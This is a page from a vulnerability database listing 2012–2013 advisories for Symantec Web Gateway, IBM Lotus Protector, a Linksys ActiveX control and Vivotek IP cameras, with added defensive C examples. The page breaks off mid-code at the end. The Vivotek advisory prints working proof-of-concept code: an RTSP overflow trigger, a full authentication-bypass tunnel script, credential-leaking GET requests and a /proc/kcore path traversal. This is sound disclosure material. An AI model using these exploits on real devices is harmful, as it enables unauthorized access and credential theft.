VARIoT IoT vulnerabilities database
| VAR-201207-0236 | CVE-2012-2961 | Symantec Web Gateway SQL Injection Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
SQL injection vulnerability in the management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. According to the Symantec security advisory, this vulnerability is an SQL injection issue: arbitrary SQL commands may be executed by a third party.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more.
----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Symantec Web Gateway Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA50031
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50031/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
RELEASE DATE:
2012-07-23
DISCUSS ADVISORY:
http://secunia.com/advisories/50031/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50031/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Symantec Web Gateway,
which can be exploited by malicious, local users to bypass certain
security restrictions and by malicious people to bypass certain
security restrictions, conduct SQL injection attacks, and compromise
a vulnerable system.
1) The application improperly validates certain input via the
management console and can be exploited to inject arbitrary shell
commands.
2) An error within the authentication mechanism of the application
can be exploited to bypass the authentication by modification of
certain local files.
3) Certain unspecified input passed to the management console is not
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
4) The application improperly validates certain input to multiple
scripts via the management console and can be exploited to e.g.
inject arbitrary shell commands.
5) The application improperly validates certain input via the
management console and can be exploited to change the password of an
arbitrary user of the application.
The vulnerabilities are reported in versions prior to Database Update
5.0.0.438.
SOLUTION:
Apply Database Update 5.0.0.438.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Offensive Security via CERT/CC
2, 3) Offensive Security via CERT/CC and an anonymous person via
CERT/CC.
4, 5) An anonymous person via CERT/CC.
ORIGINAL ADVISORY:
SYM12-011:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120720_00
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keep their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0235 | CVE-2012-2957 | Symantec Web Gateway contains multiple vulnerabilities |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows local users to gain privileges by modifying files, related to a "file inclusion" issue. The Symantec security advisory describes this vulnerability as a local file inclusion: a local user may gain privileges by modifying files. Successful exploits may lead to other attacks. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more.
| VAR-201207-0233 | CVE-2012-2953 | Symantec Web Gateway contains multiple vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to execute arbitrary commands via crafted input to application scripts.
Successful exploits will result in the execution of arbitrary attacker-supplied commands in the context of the affected application. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more.
| VAR-201207-0171 | CVE-2012-2977 | Symantec Web Gateway Password Change Security Bypass Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to change arbitrary passwords via crafted input to an application script. This may aid in further attacks. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more.
| VAR-201207-0170 | CVE-2012-2976 | Symantec Web Gateway contains multiple vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to execute arbitrary shell commands via crafted input to application scripts, related to an "injection" issue. Symantec Web Gateway is a Web security gateway hardware appliance.
An attacker can exploit this issue to inject and execute arbitrary code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more.
| VAR-201211-0084 | CVE-2012-5851 | WebKit cross-site scripting (XSS) protection mechanism bypass vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
html/parser/XSSAuditor.cpp in WebCore in WebKit, as used in Google Chrome through 22 and Safari 5.1.7, does not consider all possible output contexts of reflected data, which makes it easier for remote attackers to bypass a cross-site scripting (XSS) protection mechanism via a crafted string, aka rdar problem 12019108. WebKit is prone to a security-bypass vulnerability.
An attacker can exploit this vulnerability to bypass the cross-site scripting filter mechanism. Successful exploits may allow attackers to execute arbitrary script code and steal cookie-based authentication credentials. WebKit is an open source web browser engine jointly developed by companies such as KDE, Apple, and Google, and is currently used by browsers such as Apple Safari and Google Chrome. The vulnerability exists in html/parser/XSSAuditor.cpp in WebCore in WebKit, as used in Google Chrome 22 and Safari 5.1.7, and stems from the XSS Auditor not considering all possible output contexts of reflected data.
| VAR-201207-0459 | CVE-2012-2202 | IBM ISS Proventia Mail Security contains multiple vulnerabilities |
CVSS V2: 3.5 CVSS V3: - Severity: LOW |
Directory traversal vulnerability in javatester_init.php in IBM Lotus Protector for Mail Security 2.1, 2.5, 2.5.1, and 2.8 and IBM ISS Proventia Network Mail Security System allows remote authenticated administrators to read arbitrary files via a .. (dot dot) in the template parameter.
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Remote authenticated users can use this vulnerability to read arbitrary files via .. (dot dot) sequences in the template parameter.
----------------------------------------------------------------------
TITLE:
IBM Lotus Protector for Mail Security Information Disclosure Weakness
SECUNIA ADVISORY ID:
SA49897
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49897/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49897
RELEASE DATE:
2012-07-17
DISCUSS ADVISORY:
http://secunia.com/advisories/49897/#comments
DESCRIPTION:
A weakness has been reported in IBM Lotus Protector for Mail
Security, which can be exploited by malicious users to disclose
potentially sensitive information.
Certain input to the management interface is not properly verified
before being used to display files. This can be exploited to disclose
the contents of arbitrary files.
Successful exploitation requires access to the administrative user
interface (UI).
The weakness is reported in versions 2.5, 2.5.1, and 2.8.
SOLUTION:
Apply updates (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
IBM:
http://www.ibm.com/support/docview.wss?uid=swg21605199
| VAR-201207-0147 | CVE-2012-3128 | Oracle SPARC T Series server firmware Integrated Lights Out Manager Processing vulnerability |
CVSS V2: 3.7 CVSS V3: - Severity: LOW |
Unspecified vulnerability in Oracle SPARC T-Series Servers running System Firmware 8.2.0 and 8.1.4.e or earlier allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Integrated Lights Out Manager. A denial-of-service (DoS) attack may be carried out. Oracle Sun Products Suite is prone to a local vulnerability in SPARC T-Series Servers.
The 'Integrated Lights Out Manager' sub component is affected.
This vulnerability affects the following supported versions:
System Firmware 8.1.4.e or earlier, System Firmware 8.2.0
| VAR-201207-0320 | CVE-2012-0284 | Cisco Linksys PlayerPT ActiveX Control stack-based buffer overflow vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Stack-based buffer overflow in the SetSource method in the Cisco Linksys PlayerPT ActiveX control 1.0.0.15 in PlayerPT.ocx on the Cisco WVC200 Wireless-G PTZ Internet video camera allows remote attackers to execute arbitrary code via a long URL in the first argument (aka the sURL argument). Cisco Linksys PlayerPT ActiveX Control is prone to a buffer-overflow vulnerability because the application fails to adequately check boundaries on user-supplied input.
An attacker can exploit this issue to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
Cisco Linksys PlayerPT 1.0.0.15 is vulnerable; other versions may also be affected.
======================================================================
2) Severity
Rating: Highly critical
Impact: System compromise
Where: Remote
======================================================================
3) Description of Vulnerability
Secunia Research has discovered a vulnerability in Cisco Linksys
PlayerPT ActiveX Control, which can be exploited by malicious people
to compromise a user's system. The ActiveX control is marked
safe-for-scripting, and one of the methods it provides is
"SetSource()", which is used to set the source of the footage to view.
The method accepts five string arguments, where the first ("sURL") is
the URL to the footage.
When a web page instantiates the ActiveX control and invokes the
"SetSource()" method, the function in PlayerPT.ocx responsible for
handling this method is called. The function performs various checks
on the supplied arguments including a check to determine if the
"sFrameType" string (2nd argument) is set to "mpeg". If so, the
function searches for and strips "img/video.asf" from the provided URL
in the "sURL" argument; if not, "img/mjpeg.cgi" is used.
The URL is stored in a CString object and URLs to various resources
are crafted from that base URL, including a URL to the
"img/query.cgi" resource. Later, this URL is copied into a 256 byte
stack buffer via a call to sprintf() without performing any size
checks. This can be exploited to cause a stack-based buffer overflow
via an overly long, specially crafted URL.
Successful exploitation allows execution of arbitrary code.
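As an added illustration (not code from PlayerPT.ocx or from Secunia), the pattern described above beside a bounded replacement: build_query_url_unbounded() mirrors the unchecked sprintf() into a fixed 256-byte buffer, and build_query_url_bounded() uses snprintf() and treats truncation as an error. The function names, the URL layout and the sample inputs are assumptions; only the 256-byte size and the "img/query.cgi" suffix come from the advisory.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Size taken from the advisory text: a 256-byte stack buffer. */
#define QUERY_BUF_SIZE 256
#define QUERY_SUFFIX "/img/query.cgi"

/* The defect as the advisory describes it (an illustrative reconstruction,
 * not the real PlayerPT.ocx code): the base URL is joined to the resource
 * path with sprintf() into a fixed 256-byte buffer and nothing checks the
 * length first. A base_url of roughly 240 bytes or more writes past the
 * buffer. It is shown only for contrast; main() and the tests never call
 * it with over-long input. */
void build_query_url_unbounded(char out[QUERY_BUF_SIZE], const char *base_url)
{
    sprintf(out, "%s" QUERY_SUFFIX, base_url);
}

/* Hardened form: snprintf() bounds the write, and its return value (the
 * length the complete string would have needed) is checked so that a
 * truncated URL is reported as an error rather than used. */
bool build_query_url_bounded(char *out, size_t out_size, const char *base_url)
{
    if (out == NULL || base_url == NULL || out_size == 0)
        return false;
    int needed = snprintf(out, out_size, "%s" QUERY_SUFFIX, base_url);
    if (needed < 0 || (size_t)needed >= out_size) {
        out[0] = '\0';              /* do not leave a partial URL behind */
        return false;
    }
    return true;
}

/* The length check the original code lacked, as a stand-alone predicate:
 * true when base_url plus the suffix and terminator fit the 256-byte buffer. */
bool base_url_fits(const char *base_url)
{
    return strlen(base_url) + strlen(QUERY_SUFFIX) + 1 <= QUERY_BUF_SIZE;
}

int main(void)
{
    char buf[QUERY_BUF_SIZE];
    char longurl[301];

    /* Constructed sample input of ordinary length. */
    const char *ok = "http://192.0.2.10";
    if (build_query_url_bounded(buf, sizeof buf, ok))
        printf("built: %s\n", buf);

    /* Constructed sample input: 300 'a' characters, longer than the buffer. */
    memset(longurl, 'a', 300);
    longurl[300] = '\0';
    printf("fits: %s, bounded build accepted: %s\n",
           base_url_fits(longurl) ? "yes" : "no",
           build_query_url_bounded(buf, sizeof buf, longurl) ? "yes" : "no");
    return 0;
}
```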
======================================================================
4) Solution
According to the vendor, the ActiveX control is bundled only with
products considered EOL and, therefore, itself considered EOL. The
vendor is currently working on getting the kill-bit set.
As a workaround, set the kill-bit for the following CLSID:
* {9E065E4A-BD9D-4547-8F90-985DC62A5591}
======================================================================
5) Time Table
23/03/2012 - Vulnerability discovered while analysing public report of
similar vulnerability (SA48543#1).
23/03/2012 - Vendor notified.
02/04/2012 - Vendor response (WVC200 product bundling the ActiveX
control has become EOL).
03/04/2012 - Vendor informed that ActiveX control should have kill-bit
set if considered EOL and asked to confirm that no
currently supported products bundle it.
13/04/2012 - Status update requested.
15/04/2012 - Vendor response (currently checking which products bundle
the ActiveX control and looking into setting kill-bit).
21/06/2012 - Status update requested.
13/07/2012 - Status update requested.
13/07/2012 - Vendor response (determined that no supported products
bundle the vulnerable ActiveX control and looking into
setting kill-bit).
17/07/2012 - Public disclosure.
======================================================================
6) Credits
Discovered by Carsten Eiram, Secunia Research.
======================================================================
7) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2012-0284 for the vulnerability.
======================================================================
8) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
9) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2012-25/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
| VAR-201207-0234 | CVE-2012-2955 | IBM ISS Proventia Mail Security contains multiple vulnerabilities |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in the administrative user interface in IBM Lotus Protector for Mail Security 2.1, 2.5, 2.5.1, and 2.8 and IBM ISS Proventia Network Mail Security System allow remote attackers to inject arbitrary web script or HTML via the query string.
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. IBM Lotus Protector for Mail Security is an e-mail content filtering solution for IBM Lotus Notes, IBM Lotus Domino, Microsoft Exchange and hybrid e-mail environments. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML through query strings, and to leak arbitrary file content. The vulnerabilities exist in IBM Lotus Protector versions 2.5, 2.5.1, and 2.8. ----------------------------------------------------------------------
TITLE:
IBM Lotus Protector for Mail Security Information Disclosure Weakness
SECUNIA ADVISORY ID:
SA49897
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49897/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49897
RELEASE DATE:
2012-07-17
DISCUSS ADVISORY:
http://secunia.com/advisories/49897/#comments
DESCRIPTION:
A weakness has been reported in IBM Lotus Protector for Mail
Security, which can be exploited by malicious users to disclose
potentially sensitive information.
Certain input to the management interface is not properly verified
before being used to display files. This can be exploited to disclose
the contents of arbitrary files.
Successful exploitation requires access to the administrative user
interface (UI).
The weakness is reported in versions 2.5, 2.5.1, and 2.8.
SOLUTION:
Apply updates (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
IBM:
http://www.ibm.com/support/docview.wss?uid=swg21605199
----------------------------------------------------------------------
| VAR-202001-0837 | CVE-2013-1597 |
Vivotek Network Cameras Information Disclosure Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201207-0004 |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
A Directory Traversal vulnerability exists in Vivotek PT7135 IP Cameras 0300a and 0400a via a specially crafted GET request, which could let a malicious user obtain user credentials. The Vivotek PT7135 IP Camera contains a path traversal vulnerability. Information may be obtained. Vivotek Network Cameras are wireless network cameras. Vivotek Network Cameras fail to properly handle user-submitted requests, allowing remote attackers to submit malicious requests for sensitive information such as FTP and DYNDNS credentials. Multiple Vivotek IP Camera products are prone to a directory-traversal vulnerability because they fail to sufficiently sanitize user-supplied input.
Successful exploits will allow a remote attacker to gain access to sensitive information. Information obtained will aid in further attacks.
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com
Vivotek IP Cameras Multiple Vulnerabilities
1. *Advisory Information*
Title: Vivotek IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0301
Advisory URL:
http://www.coresecurity.com/advisories/vivotek-ip-cameras-multiple-vulnerabilities
Date published: 2013-04-29
Date of last update: 2013-04-29
Vendors contacted: Vivotek
Release mode: User release
2. *Vulnerability Information*
Class: Information leak through GET request [CWE-598], Buffer overflow
[CWE-119], Authentication issues [CWE-287], Path traversal [CWE-22], OS
command injection [CWE-78]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1594, CVE-2013-1595, CVE-2013-1596, CVE-2013-1597,
CVE-2013-1598
3. *Vulnerability Description*
Multiple vulnerabilities have been found in Vivotek IP cameras [1] (and
potentially cameras from other vendors sharing the affected firmware)
that could allow an unauthenticated remote attacker:
1. [CVE-2013-1594] to process GET requests that contain sensitive
information,
2. [CVE-2013-1595] to execute arbitrary code,
3. [CVE-2013-1596] to access the video stream via RTSP,
4. [CVE-2013-1597] to dump the camera's memory and retrieve user
credentials,
5. [CVE-2013-1598] to execute arbitrary commands from the
administration web interface (pre-authentication with firmware 0300a and
post-authentication with firmware 0400a).
4. *Vulnerable Packages*
. Other Vivotek cameras/firmware are probably affected too, but they
were not checked.
5. *Non-Vulnerable Packages*
Vendor did not provide details. Contact Vivotek for further information.
6. *Vendor Information, Solutions and Workarounds*
There was no official answer from Vivotek after several attempts to
report these vulnerabilities (see [Sec. 9]). Contact vendor for further
information.
Some mitigation actions may be:
. Do not expose the camera to internet unless absolutely necessary.
. Filter RTSP traffic (default port 554) if possible.
. Have at least one proxy filtering '/../../' and 'getparam.cgi' in
HTTP requests.
. Filter strings in the parameter 'system.ntp' on every request made
to the binary 'farseer.out'.
7. *Credits*
[CVE-2013-1594] was originally discovered and reported [2] by Alejandro
Leon Morales [3] and re-discovered on new firmware versions by Flavio De
Cristofaro from Core Security.
[CVE-2013-1595] and [CVE-2013-1596] were discovered and researched by
Martin Rocha from Core Impact Pro Team. The PoC of [CVE-2013-1596] was
made by Martin Rocha with help of Juan Cotta from Core QA Team.
[CVE-2013-1597] and [CVE-2013-1598] were discovered and researched by
Francisco Falcon and Nahuel Riva from Core Exploit Writers Team.
The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.
8. *Technical Description / Proof of Concept Code*
8.1. Sensitive information stored in plain text includes:
. FTP credentials
. Share folder credentials
. SMTP credentials
. WEP / WPA Keys
. DynDNS credentials
. Safe100.net credentials
. TZO credentials, among others.
The following GET requests can exploit the vulnerability (requests may
change according to firmware versions and vendors devices):
/-----
http://192.168.1.100/cgi-bin/admin/getparam.cgi
http://192.168.1.100/setup/parafile.html
-----/
8.2. *Remote Buffer Overflow*
[CVE-2013-1595] The following Python script can be used to trigger the
vulnerability. This script will send to the RTSP service a specially
crafted packet with the header field 'Authorization' fully completed
with the character 'a' (0x61). As a result, the Instruction Pointer
register (IP) will be overwritten with 0x61616161, which is a typical
buffer overrun condition.
/-----
import socket, base64
cam_ip = '192.168.1.100'
session_descriptor = 'live.sdp'
request = 'DESCRIBE rtsp://%s/%s RTSP/1.0\r\n' % (cam_ip, session_descriptor)
request+= 'CSeq: 1\r\n'
request+= 'Authorization: Basic %s\r\n'
request+= '\r\n'
auth_little = 'a' * 1000
auth_big = 'a' * 10000
msgs = [request % auth_little, request % auth_big]
for msg in msgs:
    s = socket.socket()
    s.connect((cam_ip, 554))
    print s.send(msg)
    print s.recv(0x10000)
    s.close()
-----/
8.3. *RTSP Authentication Bypass*
[CVE-2013-1596] This vulnerability is triggered by sending specially
crafted RTSP packets to remote TCP port 554 of a Vivotek PT7135 camera.
As a result, the video stream can be accessed by an unauthenticated
remote attacker.
/-----
import sys
from socket import *
from threading import Thread
import time, re

LOGGING = 1

def log(s):
    if LOGGING:
        print '(%s) %s' % (time.ctime(), s)

class UDPRequestHandler(Thread):
    def __init__(self, data_to_send, recv_addr, dst_addr):
        Thread.__init__(self)
        self.data_to_send = data_to_send
        self.recv_addr = recv_addr
        self.dst_addr = dst_addr

    def run(self):
        sender = socket(AF_INET, SOCK_DGRAM)
        sender.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        sender.sendto(self.data_to_send, self.dst_addr)
        response = sender.recv(1024)
        sender.sendto(response, self.recv_addr)
        sender.close()

class UDPDispatcher(Thread):
    dispatchers = []

    def __has_dispatcher_for(self, port):
        return any([d.src_port == port for d in UDPDispatcher.dispatchers])

    def __init__(self, src_port, dst_addr):
        Thread.__init__(self)
        if self.__has_dispatcher_for(src_port):
            raise Exception('There is already a dispatcher for port %d' % src_port)
        self.src_port = src_port
        self.dst_addr = dst_addr
        UDPDispatcher.dispatchers.append(self)

    def run(self):
        listener = socket(AF_INET, SOCK_DGRAM)
        listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        listener.bind(('', self.src_port))
        while 1:
            try:
                data, recv_addr = listener.recvfrom(1024)
                if not data: break
                UDPRequestHandler(data, recv_addr, self.dst_addr).start()
            except Exception as e:
                print e
                break
        listener.close()
        UDPDispatcher.dispatchers.remove(self)

class PipeThread(Thread):
    pipes = []

    def __init__(self, source, sink, process_data_callback=lambda x: x):
        Thread.__init__(self)
        self.source = source
        self.sink = sink
        self.process_data_callback = process_data_callback
        PipeThread.pipes.append(self)

    def run(self):
        while 1:
            try:
                data = self.source.recv(1024)
                data = self.process_data_callback(data)
                if not data: break
                self.sink.send(data)
            except Exception as e:
                log(e)
                break
        PipeThread.pipes.remove(self)

class TCPTunnel(Thread):
    def __init__(self, src_port, dst_addr, process_data_callback=lambda x: x):
        Thread.__init__(self)
        log('[*] Redirecting: localhost:%s -> %s:%s' % (src_port, dst_addr[0], dst_addr[1]))
        self.dst_addr = dst_addr
        self.process_data_callback = process_data_callback
        # Create TCP listener socket
        self.sock = socket(AF_INET, SOCK_STREAM)
        self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        self.sock.bind(('', src_port))
        self.sock.listen(5)

    def run(self):
        while 1:
            # Wait until a new connection arises
            newsock, address = self.sock.accept()
            # Create forwarder socket
            fwd = socket(AF_INET, SOCK_STREAM)
            fwd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
            fwd.connect(self.dst_addr)
            # Pipe them!
            PipeThread(newsock, fwd, self.process_data_callback).start()
            PipeThread(fwd, newsock, self.process_data_callback).start()

class Camera():
    def __init__(self, address):
        self.address = address

    def get_describe_data(self):
        return ''

class Vivotek(Camera):
    # Vivotek PT7135/0400a
    def __init__(self, address):
        Camera.__init__(self, address)

    def get_describe_data(self):
        return 'v=0\r\no=RTSP 836244 0 IN IP4 0.0.0.0\r\ns=RTSP server\r\nc=IN IP4 0.0.0.0\r\nt=0 0\r\na=charset:Shift_JIS\r\na=range:npt=0-\r\na=control:*\r\na=etag:1234567890\r\nm=video 0 RTP/AVP 96\r\nb=AS:1200\r\na=rtpmap:96 MP4V-ES/30000\r\na=control:trackID=1\r\na=fmtp:96 profile-level-id=3;config=000001B003000001B509000001000000012000C48881F4514043C1463F;decode_buf=76800\r\nm=audio 0 RTP/AVP 97\r\na=control:trackID=3\r\na=rtpmap:97 mpeg4-generic/16000/2\r\na=fmtp:97 streamtype=5; profile-level-id=15; mode=AAC-hbr; config=1410;SizeLength=13; IndexLength=3; IndexDeltaLength=3; CTSDeltaLength=0; DTSDeltaLength=0;\r\n'

class RTSPAuthByPasser():
    DESCRIBE_REQ_HEADER = 'DESCRIBE rtsp://'
    UNAUTHORIZED_RESPONSE = 'RTSP/1.0 401 Unauthorized'
    SERVER_PORT_ARGUMENTS = 'server_port='
    DEFAULT_CSEQ = 1
    DEFAULT_SERVER_PORT_RANGE = '5556-5559'

    def __init__(self, local_port, camera):
        self.last_describe_req = ''
        self.camera = camera
        self.local_port = local_port

    def start(self):
        log('[!] Starting bypasser')
        TCPTunnel(self.local_port, self.camera.address, self.spoof_rtsp_conn).start()

    def spoof_rtsp_conn(self, data):
        if RTSPAuthByPasser.DESCRIBE_REQ_HEADER in data:
            self.last_describe_req = data
        elif RTSPAuthByPasser.UNAUTHORIZED_RESPONSE in data and self.last_describe_req:
            log('[!] Unauthorized response received. Spoofing...')
            spoofed_describe = self.camera.get_describe_data()
            # Look for the request CSeq
            m = re.search('.*CSeq:\\s*(\\d+?)\r\n.*', self.last_describe_req)
            cseq = m.group(1) if m else RTSPAuthByPasser.DEFAULT_CSEQ
            # Create the response
            data = 'RTSP/1.0 200 OK\r\n'
            data+= 'CSeq: %s\r\n' % cseq
            data+= 'Content-Type: application/sdp\r\n'
            data+= 'Content-Length: %d\r\n' % len(spoofed_describe)
            data+= '\r\n'
            # Attach the spoofed describe
            data+= spoofed_describe
        elif RTSPAuthByPasser.SERVER_PORT_ARGUMENTS in data:
            # Look for the server RTP ports
            m = re.search('.*%s\\s*(.+?)[;|\r].*' % RTSPAuthByPasser.SERVER_PORT_ARGUMENTS, data)
            ports = m.group(1) if m else RTSPAuthByPasser.DEFAULT_SERVER_PORT_RANGE
            # For each port in the range create a UDP dispatcher
            begin_port, end_port = map(int, ports.split('-'))
            for udp_port in xrange(begin_port, end_port + 1):
                try:
                    UDPDispatcher(udp_port, (self.camera.address[0], udp_port)).start()
                except:
                    pass
        return data

if __name__ == '__main__':
    if len(sys.argv) > 1:
        listener_port = camera_port = int(sys.argv[1])
        camera_ip = sys.argv[2]
        if len(sys.argv) == 4:
            camera_port = int(sys.argv[3])
        RTSPAuthByPasser(listener_port, Vivotek((camera_ip, camera_port))).start()
    else:
        # The script name was missing from the usage format string
        print 'usage: python %s [local_port] [camera_ip] [camera_rtsp_port]' % sys.argv[0]
-----/
8.4. *User Credentials Leaked via Path Traversal*
[CVE-2013-1597] The following Python code exploits a path traversal and
dumps the camera's memory. Valid user credentials can be extracted from
this memory dump by an unauthenticated remote attacker (firmware 0300a).
The same attack is still valid with firmware 0400a but the user has to
be authenticated in order to exploit this flaw.
/-----
import httplib
conn = httplib.HTTPConnection("192.168.1.100")
conn.request("GET", "/../../../../../../../../../proc/kcore")
resp = conn.getresponse()
data = resp.read()
-----/
8.5. *OS Command Injection*
[CVE-2013-1598] The command injection is located in the binary file
'farseer.out' in the parameter 'system.ntp':
/-----
.text:0000CB34 MOV R1, R4
.text:0000CB38 LDR R0, =aCmdporcessStar ; "[CmdPorcess] Start sync with NTP server %s"...
.text:0000CB3C ADD R10, SP, #0x144+var_120
.text:0000CB40 BNE loc_CB68
[...]
.text:0000CB68 BL .printf
.text:0000CB6C LDR R2, =aSS_0 ; "%s%s"
.text:0000CB70 LDR R3, =aUsrSbinPsntpda ; "/usr/sbin/psntpdate -4fr "
.text:0000CB74 MOV R1, #0xFF ; maxlen
.text:0000CB78 MOV R0, R10 ; s
.text:0000CB7C STR R4, [SP,#0x144+var_144]
.text:0000CB80 BL .snprintf
.text:0000CB84 MOV R0, R10 ; command
.text:0000CB88 BL .system
-----/
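An added example, not Core's or Vivotek's code, serving both the mitigations in section 6 and the system.ntp injection shown above: request_filter_reason() flags the '/../' and 'getparam.cgi' patterns the advisory suggests a proxy filter, and ntp_value_is_safe() is the validation farseer.out lacks before its snprintf("%s%s") / system() call, accepting only hostname or IPv4 characters so nothing a shell interprets can reach the command line. Function names, the setparam.cgi path and all sample request lines are constructed assumptions.

```c
#include <stdbool.h>
#include <ctype.h>
#include <string.h>
#include <stdio.h>

/* Accepts only characters that can appear in a hostname or IPv4 address.
 * Anything else (spaces, ';', '|', '`', '$', quotes, ...) is rejected, so a
 * value that passes can be appended to "/usr/sbin/psntpdate -4fr " without
 * the shell behind system() being able to interpret it. Empty, over-long
 * and leading/trailing '.'/'-' values are rejected too. */
bool ntp_value_is_safe(const char *value)
{
    size_t n = strlen(value);
    if (n == 0 || n > 253)
        return false;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)value[i];
        if (!(isalnum(c) || c == '.' || c == '-'))
            return false;
    }
    return value[0] != '.' && value[0] != '-' &&
           value[n - 1] != '.' && value[n - 1] != '-';
}

/* Minimal query-string lookup on a raw (not percent-decoded) request line:
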